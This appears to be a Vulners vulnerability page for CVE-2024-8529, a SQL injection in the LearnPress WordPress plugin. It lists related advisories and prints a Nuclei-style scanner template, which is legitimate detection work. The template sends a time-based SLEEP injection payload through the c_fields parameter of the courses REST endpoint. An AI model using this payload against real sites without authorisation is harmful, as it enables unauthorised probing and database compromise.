| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-8529 | 12 Sep 202411:51 | β | circl | |
| WordPress plugin LearnPress SQL注ε ₯ζΌζ΄ | 12 Sep 202400:00 | β | cnnvd | |
| CVE-2024-8529 | 12 Sep 202408:30 | β | cve | |
| CVE-2024-8529 LearnPress β WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' | 12 Sep 202408:30 | β | cvelist | |
| Exploit for SQL Injection in Thimpress Learnpress | 12 Oct 202420:52 | β | githubexploit | |
| WordPress LearnPress Unauthenticated SQLi (CVE-2024-8522, CVE-2024-8529) | 17 Oct 202418:54 | β | metasploit | |
| CVE-2024-8529 | 12 Sep 202409:15 | β | nvd | |
| CVE-2024-8529 | 12 Sep 202409:15 | β | osv | |
| WordPress LearnPress Plugin <= 4.2.7 is vulnerable to SQL Injection | 12 Sep 202400:00 | β | patchstack | |
| WordPress LearnPress plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' vulnerability | 12 Sep 202406:36 | β | patchstack |
id: CVE-2024-8529
info:
name: LearnPress < 4.2.7.1 - SQL Injection
author: ritikchaddha,iacker
severity: critical
description: |
The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
impact: |
Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.
remediation: |
Update the LearnPress plugin to version 4.2.7.1 or later.
reference:
- https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
- https://nvd.nist.gov/vuln/detail/CVE-2024-8529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8529
cwe-id: CWE-89
epss-score: 0.11831
epss-percentile: 0.95578
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
fofa-query: body="wp-content/plugins/learnpress"
vendor: thimpress
product: learnpress
tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/learnpress/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "LearnPress", "WordPress LMS Plugin")'
condition: and
internal: true
- raw:
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(8)))a)/*{{randstr}}*/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
# digest: 490a00463044022063aebee797b485b5e4729e83811afe8714cb471b99dfb1aa49ea195292e7739b0220216e4eca3cd4c71afbf7e40bd9eac8325bc2738a488a219acce621b2c1f83fa6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation